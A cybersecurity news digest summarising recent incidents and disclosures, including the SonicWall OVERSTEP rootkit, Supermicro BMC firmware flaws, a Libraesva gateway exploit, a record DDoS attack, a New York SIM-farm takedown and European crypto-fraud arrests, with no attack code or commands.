Daily Brief

SonicWall has issued a firmware update for SMA 100 appliances to counteract a rootkit malware named OVERSTEP, which has been used to exploit fully patched, end-of-life devices. The rootkit alters the boot process of the appliances, allowing attackers to maintain persistent access and steal sensitive credentials, posing significant security risks. Google's threat analysis identified the campaign as the work of UNC6148, an uncategorized threat group, highlighting the ongoing threat to SonicWall's products. SonicWall and CISA have also warned of brute-force attacks on SonicWall's cloud backup service, urging customers to verify their device security. SonicWall's recent challenges include ransomware attacks linked to Akira affiliates, exploiting a high-severity CVE-2024-40766 vulnerability in their firewall devices. The company advises users to upgrade to firmware version 10.2.2.2-92sv to mitigate these threats and protect their systems from further exploitation. These incidents underscore the importance of timely patch management and vigilant monitoring of security advisories to safeguard critical infrastructure.

Researchers identified two vulnerabilities in Supermicro's Baseboard Management Controller (BMC) firmware, enabling attackers to bypass security verification and install malicious firmware images. The flaws, CVE-2025-7937 and CVE-2024-10237, stem from improper cryptographic signature verification, potentially allowing persistent control over BMC and main server OS. CVE-2024-10238 and CVE-2024-10239 involve stack overflow issues in image verification, facilitating arbitrary code execution within the BMC context. Binarly's analysis revealed that the fix for CVE-2024-10237 was inadequate, allowing attackers to manipulate firmware validation processes and bypass security measures. Successful exploitation of these vulnerabilities could bypass the BMC Root of Trust (RoT), posing significant risks to the entire ecosystem if signing keys are compromised. Recommendations include rotating cryptographic signing keys per product line to mitigate the impact of potential key leaks, drawing lessons from past incidents like PKfail. This discovery highlights the critical need for robust firmware security practices to prevent unauthorized access and control over server management systems.

Libraesva issued an urgent patch for its Email Security Gateway (ESG) after a vulnerability, CVE-2025-59689, was exploited by suspected state-sponsored hackers. The vulnerability, affecting versions 4.5 and later, allows arbitrary shell command execution from non-privileged user accounts via malicious email attachments. The flaw results from improper sanitization during the removal of active code in certain compressed archive formats, posing significant security risks. The emergency update was deployed 17 hours post-discovery, automatically applied to cloud and on-premise systems, addressing the root cause and scanning for compromise indicators. Organizations using unsupported versions below 5.0 must manually upgrade, as these will not receive patches, emphasizing the need for timely updates. The targeted attack on a single appliance suggests a high level of precision, underscoring the critical nature of rapid response to such threats. This incident highlights the importance of maintaining up-to-date security measures and swift remediation to mitigate potential state-sponsored cyber threats.

European authorities arrested five individuals linked to a cryptocurrency fraud scheme that deceived over 100 victims, amassing more than €100 million across France, Germany, Italy, and Spain. The operation involved coordinated searches in Spain, Portugal, Italy, Romania, and Bulgaria, leading to the freezing of bank accounts and financial assets tied to the cybercrime ring. The primary suspect operated an online investment platform promising high returns in cryptocurrencies, only to transfer victims' funds to Lithuanian accounts for laundering. Victims faced additional fees when attempting withdrawals, after which the fraudulent website disappeared, leaving them with significant financial losses. Eurojust and Europol coordinated the investigation, which spanned 23 countries, highlighting the extensive reach and complexity of the fraud. The U.S. Federal Trade Commission reported a surge in investment scams, with Americans losing $5.7 billion in 2024, marking a 25% increase from the previous year. The crackdown aligns with global efforts, including a recent Seoul Metropolitan Police operation that disrupted another cybercrime network stealing $30 million from high-profile targets.

WhatsApp has launched a new translation feature for Android and iPhone, enabling users to translate messages in chats, groups, and channels. Android users can activate automatic translation, translating entire chat threads without manual input, while iPhone users must manually tap 'Translate'. The feature initially supports over 19 languages on iOS and includes English, Spanish, Hindi, Portuguese, Russian, and Arabic on Android. WhatsApp ensures user privacy by performing translations directly on devices, preventing data from being sent to company servers. This update follows recent security enhancements, including advanced chat privacy and scam detection features. WhatsApp's platform serves over three billion users across more than 180 countries, emphasizing its global reach and need for multilingual support. The introduction of these features aims to enhance user experience and security, reflecting WhatsApp's commitment to privacy and user protection.

SolarWinds released a hotfix addressing a critical 9.8-severity vulnerability in its Web Help Desk software, marking the third attempt to resolve this issue. The flaw, identified as CVE-2025-26399, allows remote, unauthenticated attackers to execute commands on affected systems, posing significant security risks. Previous attempts to patch related vulnerabilities, CVE-2024-28986 and CVE-2024-28988, were bypassed, leading to continued exploitation by cybercriminals. The vulnerability was discovered by an anonymous researcher working with Trend Micro's Zero Day Initiative, highlighting ongoing collaboration in vulnerability identification. While there are no confirmed exploitations of CVE-2025-26399 yet, experts caution that SolarWinds' history suggests a high likelihood of future attacks. The Cybersecurity and Infrastructure Security Agency (CISA) previously listed related vulnerabilities in its Known Exploited Vulnerabilities catalog, emphasizing the urgency of patching. This situation underscores the critical need for organizations using SolarWinds software to apply the latest patches promptly to mitigate potential threats.

Rapid7 identified a critical vulnerability in OnePlus smartphones, allowing any app to access SMS and MMS data without user permission or notification. The flaw, tracked as CVE-2025-10184, is present in OxygenOS 12 and later versions, affecting multiple OnePlus devices. Exploitation of this vulnerability requires no user interaction and can bypass SMS-based multi-factor authentication, posing significant security risks. Despite repeated attempts by Rapid7 to engage OnePlus for remediation since May 2023, the vendor has not responded, leading to public disclosure. The vulnerability stems from SQL injection issues in Android's internal content providers, which manage data access and permissions. Rapid7 advises users to install apps from trusted sources, switch to authenticator app-based MFA, and use encrypted messaging apps to mitigate risks. The lack of response from OnePlus raises concerns about vendor accountability and the need for proactive security measures in the industry.

Cloudflare successfully mitigated an unprecedented DDoS attack peaking at 22.2 terabits per second and 10.6 billion packets per second, marking the largest attack on record. The attack, although brief at 40 seconds, generated traffic equivalent to streaming one million 4K videos simultaneously, posing significant challenges to network infrastructure. The assault's packet rate of 10.6 Bpps strained firewalls, routers, and load balancers, demonstrating the evolving complexity and scale of modern DDoS threats. Cloudflare's previous experience with large-scale DDoS attacks, including an 11.5 Tbps incident, underscores the increasing frequency and sophistication of these cyber threats. The AISURU botnet, linked to the 11.5 Tbps attack, has compromised over 300,000 devices globally, exploiting vulnerabilities in various routers and IoT devices. The attack's magnitude emphasizes the critical need for robust DDoS protection strategies and continuous monitoring to safeguard network availability and integrity. Organizations should prioritize updating and securing network devices to mitigate risks associated with botnet-driven DDoS attacks.

The U.S. Secret Service dismantled a network of over 300 SIM servers and 100,000 SIM cards in the New York tri-state area, targeting U.S. officials. This operation was critical due to the proximity to the United Nations General Assembly, highlighting the potential threat to national security. The devices were capable of disabling telecommunications infrastructure, facilitating denial-of-service attacks, and enabling encrypted communications for threat actors. Investigations revealed links between the network and nation-state actors, though specific countries and individuals involved remain undisclosed. The network reportedly issued anonymous assassination threats against senior U.S. officials, raising significant security concerns. The Secret Service's Advanced Threat Interdiction Unit is leading the investigation, emphasizing the agency's commitment to preventing threats to national security. The discovery of empty electronic safehouses in New York, Connecticut, and New Jersey suggests a sophisticated operation with potential for widespread disruption.

The US Secret Service dismantled a network of over 300 SIM servers in the New York Tri-state area, allegedly tied to nation-state hackers. The network controlled more than 100,000 SIM cards, posing a significant threat to cellular networks, particularly in New York City. These SIM farms were reportedly used for telecommunications-related threats targeting senior US government officials. The proximity of the facilities to the UN headquarters suggests a strategic location for potential disruption. Ongoing investigations indicate coordination between US operators and nation-state actors, though specific nations remain undisclosed. The Secret Service is conducting forensic examinations of seized equipment to uncover further details about the network's operations. No arrests have been made yet, but individuals known to federal law enforcement were involved in the communications. This incident underscores the potential for SIM farms to disrupt critical infrastructure and highlights the need for robust telecommunications security measures.

A U.S. federal civilian executive branch agency was breached via an unpatched GeoServer vulnerability, CVE-2024-36401, allowing remote code execution. The vulnerability was patched on June 18, 2024, but remained unaddressed, enabling attackers to exploit it and infiltrate the agency's network. Attackers leveraged the flaw to install web shells and scripts for remote access, persistence, and privilege escalation, moving laterally within the network. Detection occurred three weeks post-breach when an Endpoint Detection and Response tool flagged suspicious activity, prompting a Security Operations Center investigation. CISA advises immediate patching of critical vulnerabilities and enhanced monitoring of EDR alerts to prevent similar breaches. The incident underscores the importance of timely vulnerability management and robust incident response protocols to safeguard federal networks. CISA's advisory also identified broader cybersecurity risks, including insecure credentials and inadequate network segmentation, in other critical infrastructure assessments.

Kaspersky reports a resurgence of the "RevengeHotels" group, now using AI-generated code to enhance malware effectiveness, posing increased risks to hotel guests' card and personal data. Between June and August, Kaspersky's Global Research and Analysis Team observed the deployment of AI-enhanced malware, making intrusions more difficult to detect and counter. The group continues to use phishing emails disguised as booking requests or job applications, delivering the VenomRAT trojan to gain remote access to hotel systems. AI-generated code allows the group to create new malware variants that evade traditional security tools, complicating detection and response efforts for hotel IT staff. Brazil has been the primary target of these attacks, but incidents are emerging in other regions, indicating a broader threat landscape. Kaspersky advises hotels to enhance staff training, adjust spam filters, and implement advanced endpoint detection to mitigate these sophisticated threats. Travellers are encouraged to monitor card activity and consider using virtual payment methods to reduce exposure to potential data theft. RevengeHotels has been active for over a decade, with a history of selling access to compromised systems on dark-web markets, facilitating further criminal activities.

European law enforcement arrested five individuals linked to a cryptocurrency fraud ring, which defrauded over €100 million from more than 100 victims across 23 countries. The operation, coordinated by Eurojust and supported by Europol, involved investigative teams from Spain, Portugal, Bulgaria, Italy, Lithuania, and Romania. The fraud scheme, active since at least 2018, promised high returns on cryptocurrency investments via sophisticated online platforms, diverting funds to Lithuanian-controlled accounts. Victims faced additional fees when attempting to recover investments, ultimately losing substantial sums as fraudulent websites went offline. The joint action day resulted in searches across multiple countries, freezing bank accounts and financial assets linked to the suspects. This case is part of a broader trend, with Spanish police previously dismantling similar operations causing significant financial damages. The U.S. Federal Trade Commission reported Americans lost $12.5 billion to fraud in 2024, with investment scams accounting for $5.7 billion of these losses.

The Open Source Security Foundation (OpenSSF) and major foundations call for financial backing to sustain open-source infrastructure, crucial for global software development. Registries like Maven Central and npm manage billions of downloads monthly, yet rely on limited donations and sponsorships, posing sustainability challenges. The coalition warns that increasing demands, such as fast dependency resolution and zero downtime, are unsustainable without commercial-scale support. AI-driven dependency scraping and large-scale automated requests exacerbate infrastructure strain, leading to wasteful usage and increased operational costs. Proposed solutions include forming partnerships with commercial users, implementing tiered access models, and enhancing transparency around usage and costs. Previous appeals for government support, such as GitHub's call for open-source funding, highlight ongoing concerns over ecosystem fragility and volunteer burnout. The statement emphasizes the urgent need for financial contributions from major consumers to prevent potential downtime and ensure the infrastructure's longevity.

Tenfold Software introduces a free Identity Governance & Administration (IGA) tool for organizations with up to 150 users, aiming to simplify access management and enhance security practices. The tool automates IT onand offboarding through role-based access control, ensuring users receive necessary permissions efficiently and lose them upon departure. A self-service portal reduces IT helpdesk workload by enabling users to reset passwords and request access independently, streamlining internal processes. Tenfold's platform provides comprehensive visibility into Active Directory and SharePoint permissions, aiding administrators in maintaining best practice group structures. The tool offers centralized monitoring of file sharing in Microsoft 365, helping organizations prevent data leaks and manage external sharing effectively. Regular access reviews are facilitated, mitigating privilege creep by ensuring users only retain necessary access rights, thereby reducing security risks. Tenfold's Community Edition targets small to mid-sized businesses, offering a full feature set to improve identity governance without the complexity of enterprise solutions.